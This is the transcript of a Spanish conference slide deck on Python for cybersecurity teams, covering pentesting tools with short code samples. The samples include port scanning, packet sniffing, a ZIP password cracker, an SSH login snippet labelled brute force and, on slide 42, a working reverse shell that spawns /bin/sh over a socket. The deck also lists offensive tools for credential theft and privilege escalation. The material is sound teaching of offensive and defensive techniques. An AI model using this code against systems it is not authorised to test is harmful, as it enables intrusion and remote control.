Python para equipos de ciberseguridad(pycones)

Transcript

1. www.sti-innsbruck.at

2. About me 2 http://jmortega.github.io/

3. Books 3

4. Formación 4 https://www.adrformacion.com/cursos/pythonseg/pythonseg.html

5. Agenda • Introducción a Python para proyectos de ciberseguridad •

   Herramientas de pentesting • Herramientas Python desde el punto de vista defensivo • Herramientas Python desde el punto de vista ofensivo 5

6. Python para proyectos de ciberseguridad 6 1. Diseñado para la

   creación rápida de prototipos 2. Estructura simple y limpia, mejora la legibilidad y facilidad de uso. 3. Amplia biblioteca, también facilidad de interconexión 4. Ampliamente adoptado, la mayoría de las distribuciones de Linux lo instalan por defecto.

7. Python para proyectos de ciberseguridad 7

8. Herramientas de pentesting 8 import re input_ip = input('Enter the

   ip:') flag = 0 pattern = "^\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}$" match = re.match(pattern, input_ip) if (match): field = input_ip.split(".") for i in range(0, len(field)): if (int(field[i]) < 256): flag += 1 else: flag = 0 if (flag == 4): print("valid ip") else: print('No match for ip or not a valid ip') https://docs.python.org/3/library/re.html

9. Herramientas de pentesting 9

10. Herramientas de pentesting 10 import nmap nma = nmap.PortScannerAsync() def

    callback_function(host, scan_result): print('RESULTADO ==>') print(host, scan_result) nma.scan(hosts='127.0.0.1', arguments='-sC -Pn', callback=callback_function) while nma.still_scanning(): print("Esperando a que termine el escaneo ...") nma.wait(2) https://pypi.org/project/python-nmap/

11. Basic Networking 11

12. Port Scanning 12

13. Port Scanning 13 import socket from concurrent import futures def

    check_port(targetIp, portNumber, timeout): TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) TCPsock.settimeout(timeout) try: TCPsock.connect((targetIp, portNumber)) return (portNumber) except: return def port_scanner(targetIp, timeout): threadPoolSize = 500 portsToCheck = 10000 executor = futures.ThreadPoolExecutor(max_workers=threadPoolSize) checks = [ executor.submit(check_port, targetIp, port, timeout) for port in range(0, portsToCheck, 1) ] for response in futures.as_completed(checks): if (response.result()): print('Listening on port: {}'.format(response.result()))

14. Port Scanning 14

15. Banner Grabing 15

16. Scraping 16 • Requests ◦ https://docs.python-requests.org/en/master ◦ Peticiones HTTP •

    BeautifulSoup ◦ https://www.crummy.com/software/BeautifulSou p/bs4/doc ◦ Parser XML,HTML • Scrapy ◦ https://scrapy.org ◦ Framework de scraping

17. Scrapy 17

18. Extracción de subdominios 18 • https://github.com/1N3/BlackWidow

19. Reconspider 19 • https://github.com/bhavsec/reconspider

20. Reconspider 20

21. SpiderFoot 21

22. RED TEAM vs BLUE TEAM 22

23. SQLMap 23 • https://sqlmap.org

24. SQLMap 24

25. PwnXSS 25

26. Fuzzing 26 • Wfuzz ◦ https://github.com/xmendez/wfuzz/ ◦ Web fuzzer framework

    • Pyfuzz ◦ https://github.com/AyoobAli/pyfuzz ◦ Fuzzing para descubrir archivos / directorios ocultos

27. Fuxi Scanner 27 • https://github.com/jeffzh3ng/fuxi

28. Fuxi Scanner 28

29. Sniffing de paquetes 29 import socket import struct def ethernet_frame(data):

    dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', data[:14]) return format_mac_addr(dest_mac), format_mac_addr(src_mac), socket.htons(proto), data[14:] def format_mac_addr(bytes_addr): bytes_str = map('{:02x}'.format, bytes_addr) return ':'.join(bytes_str).upper() def main(): conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3)) while True: raw_data, addr = conn.recvfrom(65535) dest_mac, src_mac, eth_proto, data = ethernet_frame(raw_data) if eth_proto == 8: print('\nEthernet Frame:') print('Destination: {}, Source: {}, Protocol: {}'.format(dest_mac, src_mac, eth_proto)) print(data) if __name__ == "__main__": main()

30. Manipulación de paquetes 30 • Scapy ◦ https://scapy.net ◦ Manipulación

    y decodificación de paquetes. ◦ Enviar, rastrear, diseccionar y falsificar paquetes de red.

31. Manipulación de paquetes 31 from scapy.all import * packetCount =

    0 def customAction(packet): global packetCount packetCount += 1 return "{}) {} → {}".format(packetCount, packet[0][1].src, packet[0][1].dst) ## Setup sniff, filtering for IP traffic sniff(filter="ip",prn=customAction)

32. Manipulación de paquetes 32 from scapy.all import ICMP from scapy.all

    import IP from scapy.all import sr1 from scapy.all import ls if __name__ == "__main__": dest_ip = "www.google.com" ip_layer = IP(dst = dest_ip) print(ls(ip_layer)) # displaying complete layer info # accessing the fields print("Destination = ", ip_layer.dst) print("Summary = ",ip_layer.summary())

33. Sniffing de paquetes 33 from scapy.all import * def main():

    sniff(prn=http_header, filter="tcp port 80") def http_header(packet): http_packet=str(packet) if http_packet.find('GET'): return print_packet(packet) def print_packet(packet1): ret = "-------------------------------[ Received Packet ] -------------------------------\n" ret += "\n".join(packet1.sprintf("{Raw:%Raw.load%}\n").split(r"\r\n")) ret += "---------------------------------------------------------------------------------\n" return ret if __name__ == '__main__': main()

34. Explotación 34 • CrackMapExec ◦ https://github.com/byt3bl33d3r/CrackMapExec ◦ Mapeo de la

    red, obtiene credenciales y ejecuta comandos. • DeathStar ◦ https://github.com/byt3bl33d3r/DeathStar ▪ Permite automatizar la escalada de privilegios en un entorno Active Directory.

35. Password cracking 35 import zipfile import time encrypted_filename= "secret_file.zip" zFile

    = zipfile.ZipFile(encrypted_filename, "r") passFile = open("passwords.txt", "r") for line in passFile.readlines(): test_password = line.strip("\n").encode('utf-8') try: print(test_password) zFile.extractall(pwd=test_password) print("Match found") break except Exception as err: pass

36. SSH brute force 36 import paramiko ssh = paramiko.SSHClient() ssh.load_system_host_keys()

    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(‘127.0.0.1', username=‘user', password=‘password') stdin,stdout,stderr = ssh.exec_command("uname -a")

37. SSH brute force 37

38. Ejecución de procesos 38 https://docs.python.org/3/library/subprocess.html import subprocess subprocess.run('ls -la', shell=True)

    subprocess.run(['ls', '-la'])

39. Ejecución de procesos 39 https://docs.python.org/3/library/subprocess.html import subprocess process = subprocess.run(['which',

    'python3'], capture_output=True) if process.returncode != 0: raise OSError('Sorry python3 is not installed') python_bin = process.stdout.strip() print(f'Python found in: {python_bin}') CompletedProcess(args=['which', 'python3'], returncode=0, stdout=b'/usr/bin/python3\n', stderr=b'')

40. Ejecución de procesos 40 https://docs.python.org/3/library/subprocess.html from pathlib import Path import

    subprocess source = Path("/home/linux") cmd = ["ls", "-l", source] proc = subprocess.Popen(cmd, stdout=subprocess.PIPE) stdout, stderr = proc.communicate() print(stdout.decode("utf-8").split('\n')[:-1]) <subprocess.Popen object at 0x7f9d714bf9b0>

41. Shell inversa 41

42. Shell inversa 42 #!/usr/bin/python import socket import subprocess import os

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(("127.0.0.1", 45679)) os.dup2(sock.fileno(),0) os.dup2(sock.fileno(),1) os.dup2(sock.fileno(),2) shell_remote = subprocess.call(["/bin/sh", "-i"]) #proc = subprocess.call(["/bin/ls", "-i"])

43. Books 43

44. Books 44 https://github.com/PacktPublis hing/Python-Ethical-Hacking https://github.com/PacktPub lishing/Python-for-Offensive -PenTest

45. GitHub repository 45 https://github.com/jmortega/python_ciberseguridad_2021

46. 46